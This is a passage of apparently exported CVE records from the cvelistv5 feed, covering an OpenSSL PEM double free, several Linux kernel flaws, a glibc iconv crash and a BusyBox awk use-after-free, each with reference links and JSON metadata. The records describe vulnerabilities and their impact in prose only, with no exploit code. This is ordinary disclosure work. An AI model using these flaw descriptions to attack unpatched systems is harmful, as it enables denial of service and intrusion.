has the ability to supply malicious PEM\u003cbr\u003efiles for parsing to achieve a denial of service attack.\u003cbr\u003e\u003cbr\u003eThe functions PEM_read_bio() and PEM_read() are simple wrappers around\u003cbr\u003ePEM_read_bio_ex() and therefore these functions are also directly affected.\u003cbr\u003e\u003cbr\u003eThese functions are also called indirectly by a number of other OpenSSL\u003cbr\u003efunctions including PEM_X509_INFO_read_bio_ex() and\u003cbr\u003eSSL_CTX_use_serverinfo_file() which are also vulnerable. Some OpenSSL internal\u003cbr\u003euses of these functions are not vulnerable because the caller does not free the\u003cbr\u003eheader argument if PEM_read_bio_ex() returns a failure code. These locations\u003cbr\u003einclude the PEM_read_bio_TYPE() functions as well as the decoders introduced in\u003cbr\u003eOpenSSL 3.0.\u003cbr\u003e\u003cbr\u003e\u003cdiv\u003eThe OpenSSL asn1parse command line application is also impacted by this issue.\u003c/div\u003e\u003cbr\u003e" } ], "value": "The function PEM_read_bio_ex() reads a PEM file from a BIO and parses and\ndecodes the \"name\" (e.g. \"CERTIFICATE\"), any header data and the payload data.\nIf the function succeeds then the \"name_out\", \"header\" and \"data\" arguments are\npopulated with pointers to buffers containing the relevant decoded data. The\ncaller is responsible for freeing those buffers. It is possible to construct a\nPEM file that results in 0 bytes of payload data. In this case PEM_read_bio_ex()\nwill return a failure code but will populate the header argument with a pointer\nto a buffer that has already been freed. If the caller also frees this buffer\nthen a double free will occur. This will most likely lead to a crash. This\ncould be exploited by an attacker who has the ability to supply malicious PEM\nfiles for parsing to achieve a denial of service attack.\n\nThe functions PEM_read_bio() and PEM_read() are simple wrappers around\nPEM_read_bio_ex() and therefore these functions are also directly affected.\n\nThese functions are also called indirectly by a number of other OpenSSL\nfunctions including PEM_X509_INFO_read_bio_ex() and\nSSL_CTX_use_serverinfo_file() which are also vulnerable. Some OpenSSL internal\nuses of these functions are not vulnerable because the caller does not free the\nheader argument if PEM_read_bio_ex() returns a failure code. These locations\ninclude the PEM_read_bio_TYPE() functions as well as the decoders introduced in\nOpenSSL 3.0.\n\nThe OpenSSL asn1parse command line application is also impacted by this issue.\n\n\n" } ], "metrics": [ { "format": "other", "other": { "content": { "text": "Moderate" }, "type": "https://www.openssl.org/policies/secpolicy.html" } } ], "problemTypes": [ { "descriptions": [ { "description": "double-free", "lang": "en" } ] } ], "providerMetadata": { "dateUpdated": "2023-02-24T14:53:33.164Z", "orgId": "3a12439a-ef3a-4c79-92e6-6081a721f1e5", "shortName": "openssl" }, "references": [ { "name": "OpenSSL Advisory", "tags": [ "vendor-advisory" ], "url": "https://www.openssl.org/news/secadv/20230207.txt" }, { "name": "3.0.8 git commit", "tags": [ "patch" ], "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=63bcf189be73a9cc1264059bed6f57974be74a83" }, { "name": "1.1.1t git commit", "tags": [ "patch" ], "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=bbcf509bd046b34cca19c766bbddc31683d0858b" }, { "url": "https://security.gentoo.org/glsa/202402-08" } ], "source": { "discovery": "UNKNOWN" }, "title": "Double free after calling PEM_read_bio_ex", "x_generator": { "engine": "Vulnogram 0.1.0-dev" } } }, "cveMetadata": { "assignerOrgId": "3a12439a-ef3a-4c79-92e6-6081a721f1e5", "assignerShortName": "openssl", "cveId": "CVE-2022-4450", "datePublished": "2023-02-08T19:04:04.874Z", "dateReserved": "2022-12-13T13:38:08.598Z", "dateUpdated": "2024-08-03T01:41:44.632Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-39190
Vulnerability from cvelistv5
Published
2022-09-02 00:00
Modified
2024-08-03 12:00
Severity ?
EPSS score ?
Summary
An issue was discovered in net/netfilter/nf_tables_api.c in the Linux kernel before 5.19.6. A denial of service can occur upon binding to an already bound chain.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T12:00:42.525Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://twitter.com/pr0Ln" }, { "tags": [ "x_transferred" ], "url": "https://lore.kernel.org/all/20220824220330.64283-12-pablo%40netfilter.org/" }, { "tags": [ "x_transferred" ], "url": "https://github.com/torvalds/linux/commit/e02f0d3970404bfea385b6edb86f2d936db0ea2b" }, { "tags": [ "x_transferred" ], "url": "https://cdn.kernel.org/pub/linux/kernel/v5.x/ChangeLog-5.19.6" }, { "name": "[debian-lts-announce] 20221101 [SECURITY] [DLA 3173-1] linux-5.10 security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00001.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "An issue was discovered in net/netfilter/nf_tables_api.c in the Linux kernel before 5.19.6. A denial of service can occur upon binding to an already bound chain." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2022-11-01T00:00:00", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "url": "https://twitter.com/pr0Ln" }, { "url": "https://lore.kernel.org/all/20220824220330.64283-12-pablo%40netfilter.org/" }, { "url": "https://github.com/torvalds/linux/commit/e02f0d3970404bfea385b6edb86f2d936db0ea2b" }, { "url": "https://cdn.kernel.org/pub/linux/kernel/v5.x/ChangeLog-5.19.6" }, { "name": "[debian-lts-announce] 20221101 [SECURITY] [DLA 3173-1] linux-5.10 security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00001.html" } ] } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2022-39190", "datePublished": "2022-09-02T00:00:00", "dateReserved": "2022-09-02T00:00:00", "dateUpdated": "2024-08-03T12:00:42.525Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-39188
Vulnerability from cvelistv5
Published
2022-09-02 00:00
Modified
2024-08-03 12:00
Severity ?
EPSS score ?
Summary
An issue was discovered in include/asm-generic/tlb.h in the Linux kernel before 5.19. Because of a race condition (unmap_mapping_range versus munmap), a device driver can free a page while it still has stale TLB entries. This only occurs in situations with VM_PFNMAP VMAs.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T12:00:42.380Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://bugs.chromium.org/p/project-zero/issues/detail?id=2329" }, { "tags": [ "x_transferred" ], "url": "https://lore.kernel.org/stable/CAG48ez3SEqOPcPCYGHVZv4iqEApujD5VtM3Re-tCKLDEFdEdbg%40mail.gmail.com/" }, { "tags": [ "x_transferred" ], "url": "https://cdn.kernel.org/pub/linux/kernel/v5.x/ChangeLog-5.19" }, { "tags": [ "x_transferred" ], "url": "https://github.com/torvalds/linux/commit/b67fbebd4cf980aecbcc750e1462128bffe8ae15" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=b67fbebd4cf980aecbcc750e1462128bffe8ae15" }, { "name": "[debian-lts-announce] 20221002 [SECURITY] [DLA 3131-1] linux security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2022/10/msg00000.html" }, { "name": "DSA-5257", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://www.debian.org/security/2022/dsa-5257" }, { "name": "[debian-lts-announce] 20221101 [SECURITY] [DLA 3173-1] linux-5.10 security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00001.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "An issue was discovered in include/asm-generic/tlb.h in the Linux kernel before 5.19. Because of a race condition (unmap_mapping_range versus munmap), a device driver can free a page while it still has stale TLB entries. This only occurs in situations with VM_PFNMAP VMAs." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2022-11-01T00:00:00", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "url": "https://bugs.chromium.org/p/project-zero/issues/detail?id=2329" }, { "url": "https://lore.kernel.org/stable/CAG48ez3SEqOPcPCYGHVZv4iqEApujD5VtM3Re-tCKLDEFdEdbg%40mail.gmail.com/" }, { "url": "https://cdn.kernel.org/pub/linux/kernel/v5.x/ChangeLog-5.19" }, { "url": "https://github.com/torvalds/linux/commit/b67fbebd4cf980aecbcc750e1462128bffe8ae15" }, { "url": "https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=b67fbebd4cf980aecbcc750e1462128bffe8ae15" }, { "name": "[debian-lts-announce] 20221002 [SECURITY] [DLA 3131-1] linux security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2022/10/msg00000.html" }, { "name": "DSA-5257", "tags": [ "vendor-advisory" ], "url": "https://www.debian.org/security/2022/dsa-5257" }, { "name": "[debian-lts-announce] 20221101 [SECURITY] [DLA 3173-1] linux-5.10 security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00001.html" } ] } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2022-39188", "datePublished": "2022-09-02T00:00:00", "dateReserved": "2022-09-02T00:00:00", "dateUpdated": "2024-08-03T12:00:42.380Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-36123
Vulnerability from cvelistv5
Published
2022-07-29 13:43
Modified
2024-08-03 10:00
Severity ?
EPSS score ?
Summary
The Linux kernel before 5.18.13 lacks a certain clear operation for the block starting symbol (.bss). This allows Xen PV guest OS users to cause a denial of service or gain privileges.
References
▼ | URL | Tags |
---|---|---|
https://sick.codes/sick-2022-128 | x_refsource_MISC | |
https://github.com/sickcodes/security/blob/master/advisories/SICK-2022-128.md | x_refsource_MISC | |
https://cdn.kernel.org/pub/linux/kernel/v5.x/ChangeLog-5.18.13 | x_refsource_CONFIRM | |
https://github.com/torvalds/linux/commit/96e8fc5818686d4a1591bb6907e7fdb64ef29884 | x_refsource_CONFIRM | |
https://github.com/torvalds/linux/commit/74a0032b8524ee2bd4443128c0bf9775928680b0 | x_refsource_MISC | |
https://security.netapp.com/advisory/ntap-20220901-0003/ | x_refsource_CONFIRM |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T10:00:04.244Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://sick.codes/sick-2022-128" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://github.com/sickcodes/security/blob/master/advisories/SICK-2022-128.md" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://cdn.kernel.org/pub/linux/kernel/v5.x/ChangeLog-5.18.13" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://github.com/torvalds/linux/commit/96e8fc5818686d4a1591bb6907e7fdb64ef29884" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://github.com/torvalds/linux/commit/74a0032b8524ee2bd4443128c0bf9775928680b0" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20220901-0003/" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "The Linux kernel before 5.18.13 lacks a certain clear operation for the block starting symbol (.bss). This allows Xen PV guest OS users to cause a denial of service or gain privileges." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2022-09-01T13:06:21", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://sick.codes/sick-2022-128" }, { "tags": [ "x_refsource_MISC" ], "url": "https://github.com/sickcodes/security/blob/master/advisories/SICK-2022-128.md" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "https://cdn.kernel.org/pub/linux/kernel/v5.x/ChangeLog-5.18.13" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "https://github.com/torvalds/linux/commit/96e8fc5818686d4a1591bb6907e7fdb64ef29884" }, { "tags": [ "x_refsource_MISC" ], "url": "https://github.com/torvalds/linux/commit/74a0032b8524ee2bd4443128c0bf9775928680b0" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "https://security.netapp.com/advisory/ntap-20220901-0003/" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "cve@mitre.org", "ID": "CVE-2022-36123", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "n/a", "version": { "version_data": [ { "version_value": "n/a" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "The Linux kernel before 5.18.13 lacks a certain clear operation for the block starting symbol (.bss). This allows Xen PV guest OS users to cause a denial of service or gain privileges." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "n/a" } ] } ] }, "references": { "reference_data": [ { "name": "https://sick.codes/sick-2022-128", "refsource": "MISC", "url": "https://sick.codes/sick-2022-128" }, { "name": "https://github.com/sickcodes/security/blob/master/advisories/SICK-2022-128.md", "refsource": "MISC", "url": "https://github.com/sickcodes/security/blob/master/advisories/SICK-2022-128.md" }, { "name": "https://cdn.kernel.org/pub/linux/kernel/v5.x/ChangeLog-5.18.13", "refsource": "CONFIRM", "url": "https://cdn.kernel.org/pub/linux/kernel/v5.x/ChangeLog-5.18.13" }, { "name": "https://github.com/torvalds/linux/commit/96e8fc5818686d4a1591bb6907e7fdb64ef29884", "refsource": "CONFIRM", "url": "https://github.com/torvalds/linux/commit/96e8fc5818686d4a1591bb6907e7fdb64ef29884" }, { "name": "https://github.com/torvalds/linux/commit/74a0032b8524ee2bd4443128c0bf9775928680b0", "refsource": "MISC", "url": "https://github.com/torvalds/linux/commit/74a0032b8524ee2bd4443128c0bf9775928680b0" }, { "name": "https://security.netapp.com/advisory/ntap-20220901-0003/", "refsource": "CONFIRM", "url": "https://security.netapp.com/advisory/ntap-20220901-0003/" } ] } } } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2022-36123", "datePublished": "2022-07-29T13:43:38", "dateReserved": "2022-07-16T00:00:00", "dateUpdated": "2024-08-03T10:00:04.244Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2021-3326
Vulnerability from cvelistv5
Published
2021-01-27 00:00
Modified
2024-08-03 16:53
Severity ?
EPSS score ?
Summary
The iconv function in the GNU C Library (aka glibc or libc6) 2.32 and earlier, when processing invalid input sequences in the ISO-2022-JP-3 encoding, fails an assertion in the code path and aborts the program, potentially resulting in a denial of service.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T16:53:17.469Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://sourceware.org/bugzilla/show_bug.cgi?id=27256" }, { "tags": [ "x_transferred" ], "url": "https://sourceware.org/git/?p=glibc.git%3Ba=commit%3Bh=7d88c6142c6efc160c0ee5e4f85cde382c072888" }, { "name": "[oss-security] 20210128 Re: glibc iconv crash with ISO-2022-JP-3", "tags": [ "mailing-list", "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2021/01/28/2" }, { "name": "GLSA-202107-07", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://security.gentoo.org/glsa/202107-07" }, { "tags": [ "x_transferred" ], "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20210304-0007/" }, { "tags": [ "x_transferred" ], "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "name": "[debian-lts-announce] 20221017 [SECURITY] [DLA 3152-1] glibc security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "The iconv function in the GNU C Library (aka glibc or libc6) 2.32 and earlier, when processing invalid input sequences in the ISO-2022-JP-3 encoding, fails an assertion in the code path and aborts the program, potentially resulting in a denial of service." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2022-10-17T00:00:00", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "url": "https://sourceware.org/bugzilla/show_bug.cgi?id=27256" }, { "url": "https://sourceware.org/git/?p=glibc.git%3Ba=commit%3Bh=7d88c6142c6efc160c0ee5e4f85cde382c072888" }, { "name": "[oss-security] 20210128 Re: glibc iconv crash with ISO-2022-JP-3", "tags": [ "mailing-list" ], "url": "http://www.openwall.com/lists/oss-security/2021/01/28/2" }, { "name": "GLSA-202107-07", "tags": [ "vendor-advisory" ], "url": "https://security.gentoo.org/glsa/202107-07" }, { "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "url": "https://security.netapp.com/advisory/ntap-20210304-0007/" }, { "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "name": "[debian-lts-announce] 20221017 [SECURITY] [DLA 3152-1] glibc security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html" } ] } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2021-3326", "datePublished": "2021-01-27T00:00:00", "dateReserved": "2021-01-27T00:00:00", "dateUpdated": "2024-08-03T16:53:17.469Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-1184
Vulnerability from cvelistv5
Published
2022-08-29 00:00
Modified
2024-08-02 23:55
Severity ?
EPSS score ?
Summary
A use-after-free flaw was found in fs/ext4/namei.c:dx_insert_block() in the Linux kernel’s filesystem sub-component. This flaw allows a local attacker with a user privilege to cause a denial of service.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T23:55:24.530Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2070205" }, { "tags": [ "x_transferred" ], "url": "https://access.redhat.com/security/cve/CVE-2022-1184" }, { "tags": [ "x_transferred" ], "url": "https://ubuntu.com/security/CVE-2022-1184" }, { "name": "DSA-5257", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://www.debian.org/security/2022/dsa-5257" }, { "name": "[debian-lts-announce] 20221101 [SECURITY] [DLA 3173-1] linux-5.10 security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00001.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Kernel", "vendor": "n/a", "versions": [ { "status": "affected", "version": "Not-known" } ] } ], "descriptions": [ { "lang": "en", "value": "A use-after-free flaw was found in fs/ext4/namei.c:dx_insert_block() in the Linux kernel\u2019s filesystem sub-component. This flaw allows a local attacker with a user privilege to cause a denial of service." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-416", "description": "CWE-416 - Use After Free", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2022-11-01T00:00:00", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2070205" }, { "url": "https://access.redhat.com/security/cve/CVE-2022-1184" }, { "url": "https://ubuntu.com/security/CVE-2022-1184" }, { "name": "DSA-5257", "tags": [ "vendor-advisory" ], "url": "https://www.debian.org/security/2022/dsa-5257" }, { "name": "[debian-lts-announce] 20221101 [SECURITY] [DLA 3173-1] linux-5.10 security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00001.html" } ] } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2022-1184", "datePublished": "2022-08-29T00:00:00", "dateReserved": "2022-03-30T00:00:00", "dateUpdated": "2024-08-02T23:55:24.530Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-32296
Vulnerability from cvelistv5
Published
2022-06-05 21:53
Modified
2024-08-03 07:39
Severity ?
EPSS score ?
Summary
The Linux kernel before 5.17.9 allows TCP servers to identify clients by observing what source ports are used. This occurs because of use of Algorithm 4 ("Double-Hash Port Selection Algorithm") of RFC 6056.
References
▼ | URL | Tags |
---|---|---|
https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=4c2c8f03a5ab7cb04ec64724d7d176d00bcc91e5 | x_refsource_MISC | |
https://cdn.kernel.org/pub/linux/kernel/v5.x/ChangeLog-5.17.9 | x_refsource_MISC | |
https://lists.debian.org/debian-lts-announce/2022/07/msg00000.html | mailing-list, x_refsource_MLIST | |
https://www.debian.org/security/2022/dsa-5173 | vendor-advisory, x_refsource_DEBIAN | |
https://arxiv.org/abs/2209.12993 | x_refsource_MISC | |
https://github.com/0xkol/rfc6056-device-tracker | x_refsource_MISC |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T07:39:50.938Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=4c2c8f03a5ab7cb04ec64724d7d176d00bcc91e5" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://cdn.kernel.org/pub/linux/kernel/v5.x/ChangeLog-5.17.9" }, { "name": "[debian-lts-announce] 20220701 [SECURITY] [DLA 3065-1] linux security update", "tags": [ "mailing-list", "x_refsource_MLIST", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2022/07/msg00000.html" }, { "name": "DSA-5173", "tags": [ "vendor-advisory", "x_refsource_DEBIAN", "x_transferred" ], "url": "https://www.debian.org/security/2022/dsa-5173" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://arxiv.org/abs/2209.12993" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://github.com/0xkol/rfc6056-device-tracker" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "The Linux kernel before 5.17.9 allows TCP servers to identify clients by observing what source ports are used. This occurs because of use of Algorithm 4 (\"Double-Hash Port Selection Algorithm\") of RFC 6056." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2022-09-28T14:06:37", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=4c2c8f03a5ab7cb04ec64724d7d176d00bcc91e5" }, { "tags": [ "x_refsource_MISC" ], "url": "https://cdn.kernel.org/pub/linux/kernel/v5.x/ChangeLog-5.17.9" }, { "name": "[debian-lts-announce] 20220701 [SECURITY] [DLA 3065-1] linux security update", "tags": [ "mailing-list", "x_refsource_MLIST" ], "url": "https://lists.debian.org/debian-lts-announce/2022/07/msg00000.html" }, { "name": "DSA-5173", "tags": [ "vendor-advisory", "x_refsource_DEBIAN" ], "url": "https://www.debian.org/security/2022/dsa-5173" }, { "tags": [ "x_refsource_MISC" ], "url": "https://arxiv.org/abs/2209.12993" }, { "tags": [ "x_refsource_MISC" ], "url": "https://github.com/0xkol/rfc6056-device-tracker" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "cve@mitre.org", "ID": "CVE-2022-32296", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "n/a", "version": { "version_data": [ { "version_value": "n/a" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "The Linux kernel before 5.17.9 allows TCP servers to identify clients by observing what source ports are used. This occurs because of use of Algorithm 4 (\"Double-Hash Port Selection Algorithm\") of RFC 6056." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "n/a" } ] } ] }, "references": { "reference_data": [ { "name": "https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=4c2c8f03a5ab7cb04ec64724d7d176d00bcc91e5", "refsource": "MISC", "url": "https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=4c2c8f03a5ab7cb04ec64724d7d176d00bcc91e5" }, { "name": "https://cdn.kernel.org/pub/linux/kernel/v5.x/ChangeLog-5.17.9", "refsource": "MISC", "url": "https://cdn.kernel.org/pub/linux/kernel/v5.x/ChangeLog-5.17.9" }, { "name": "[debian-lts-announce] 20220701 [SECURITY] [DLA 3065-1] linux security update", "refsource": "MLIST", "url": "https://lists.debian.org/debian-lts-announce/2022/07/msg00000.html" }, { "name": "DSA-5173", "refsource": "DEBIAN", "url": "https://www.debian.org/security/2022/dsa-5173" }, { "name": "https://arxiv.org/abs/2209.12993", "refsource": "MISC", "url": "https://arxiv.org/abs/2209.12993" }, { "name": "https://github.com/0xkol/rfc6056-device-tracker", "refsource": "MISC", "url": "https://github.com/0xkol/rfc6056-device-tracker" } ] } } } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2022-32296", "datePublished": "2022-06-05T21:53:54", "dateReserved": "2022-06-05T00:00:00", "dateUpdated": "2024-08-03T07:39:50.938Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2021-42383
Vulnerability from cvelistv5
Published
2021-11-15 00:00
Modified
2024-08-04 03:30
Severity ?
EPSS score ?
Summary
A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the evaluate function
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T03:30:38.425Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/" }, { "name": "FEDORA-2021-5a95823596", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/" }, { "name": "FEDORA-2021-c52c0fe490", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20211223-0002/" }, { "tags": [ "x_transferred" ], "url": "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "busybox", "vendor": "busybox", "versions": [ { "lessThan": "1.34.0", "status": "affected", "version": "unspecified", "versionType": "custom" } ] } ], "descriptions": [ { "lang": "en", "value": "A use-after-free in Busybox\u0027s awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the evaluate function" } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-416", "description": "CWE-416", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2023-04-25T00:00:00", "orgId": "48a46f29-ae42-4e1d-90dd-c1676c1e5e6d", "shortName": "JFROG" }, "references": [ { "url": "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/" }, { "name": "FEDORA-2021-5a95823596", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/" }, { "name": "FEDORA-2021-c52c0fe490", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/" }, { "url": "https://security.netapp.com/advisory/ntap-20211223-0002/" }, { "url": 